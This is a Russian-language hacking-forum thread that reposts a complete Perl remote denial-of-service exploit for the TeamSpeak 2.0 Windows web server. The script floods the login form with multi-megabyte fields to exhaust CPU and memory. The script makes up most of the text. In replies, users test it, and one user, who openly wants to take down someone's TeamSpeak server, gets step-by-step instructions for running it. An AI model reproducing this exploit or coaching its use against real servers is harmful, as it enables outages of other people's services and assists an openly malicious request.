PDA

Просмотр полной версии : TeamSpeak 2.0 Remote D0S Exploit


Isis
27.07.2007, 11:36
TeamSpeak 2.0 (Windows Release) Remote D0S Exploit by Yag Kohha

#!/usr/bin/perl

# TeamSpeak 2.0 (Windows Release) Remote D0S Exploit by Yag Kohha (skyhole [at] gmail.com)
# Vendor URL: http://www.goteamspeak.com/
# TeamSpeak WebServer has no tcp session expire and no checks for incoming values length.
# TODO:
# Edit $target value
# Run script
# CPU 100%, Memory up for 1.2 Gb per one attack session.
# Greetz: str0ke & milw0rm proj

use IO::Socket;

$target = 'xxx.xxx.xxx.xxx';
$port_tcp=14534;

$buffer_ascii= 'A' x 0xc00000;
$buffer_dig= '659090';
$req = "username\=$buffer_ascii\&password\=$buffer_ascii\&serverport\=$buffer_dig\&submit\=Login";
$uagent = 'Mozilla 5.0';
my $res;
my $tmp;

print "\nStarting D0S\n\n";
my $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$target", PeerPort=>"$port_tcp") or die "\n Could not connect to host\n\n";

print $sock "POST /login.tscmd HTTP/1.1\r\n";
print $sock "Host: ".$target."\r\n";
print $sock "User-Agent: ".$uagent."\r\n";
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n";
print $sock "Accept-Language: it-it,it;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
print $sock "Accept-Encoding: gzip,deflate\r\n";
print $sock "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
print $sock "Connection: close\r\n";
print $sock "Referer: http://".$target."/slogin.html\r\n";
print $sock "Content-Type: application/x-www-form-urlencoded\r\n";
print $sock "Content-Length: ".length($req)."\r\n\r\n";
print $sock $req;
print $sock "\n";

while ( $res = <$sock> ) {
$tmp.= $res;
}
print $tmp;
close($sock);

# milw0rm.com [2007-07-20]

groundhog
27.07.2007, 12:16
TeamSpeak WebServer

Аннотацию читаем, товарищи, TeamSpeak WebServer - стафф, который организует чат с возможностью голосового общения юзеров. Кстати бага боянистая очень. Исис, если уж кладёшь сплоит, то говори на что он направлен. Всё таки это не форум телепатов.

Сполит орагнизует атаку DoS используя недочёты в коде TeamSpeak WebServer (отсутствие проверки длин входящих параметров, отсутствии ограничения на время жизни TCP сессии) для исчерпания процессорных и системных ресурсов сервера.

Zedobat
27.07.2007, 12:30
После 3 минут работы скрипта TeamSpeak начал жрать 30% проца, после окончания - 0%.
Память с 4 метров до 70 метров(в начале на 300 кб\с, дальше - больше). После закрытия скрипта, также вернулось на 4 метра.
Тестил на последней версии - 2.0.23.17 BETA

После 3х минут работы скрипта в бесконечном цикле сервак сам востанавливается как нивчем не бывало :)

Molekular
12.10.2007, 15:28
Обьясните пожалуйста по конкретнее как использовать данный скрипт.(Куда что прописывать и т.д.)
Мне просто очень нужно положить один тим спик. Заранее благодарю.

kair
12.10.2007, 17:38
Обьясните пожалуйста по конкретнее как использовать данный скрипт.(Куда что прописывать и т.д.)
Мне просто очень нужно положить один тим спик. Заранее благодарю.
Скачиваешь перл http://www.izone.ru/other/programing/activeperl.htm устанавливаешь потом находишь в папке perl\bin\perl.exe и запускаешь смд перекидываешь туда этот ярлык! Затем в текст файл вставляешь код сплойта и сохраняешь как exploit.pl и тоже его кидаешь в смд


С:\perl\bin\perl.exe C:\perl\bin\sploit.pl [параметры]

Molekular
12.10.2007, 23:36
Вроде я сделал все правильно. Происходит такая штука - STARTING DOS. Далее я никаких изменений не замечаю по состоянию тимспика. Можете пожалуйста подробнее рассказать про настройку скрипта под тот тимспик. Куда вводить данные ТС. Возможно я допустил ошибку с вводом ip и port.

kair
13.10.2007, 00:02
Molekular по теме
https://forum.antichat.ru/threadnav30814-1-10.html

Molekular
13.10.2007, 00:05
Я это все уже попробовал )) :d
Мне продосить очень хочется ))

Mordalio
20.10.2007, 23:52
Реально ли убить сервер Team Speak с использованием этого эксплоита только на одной машине ?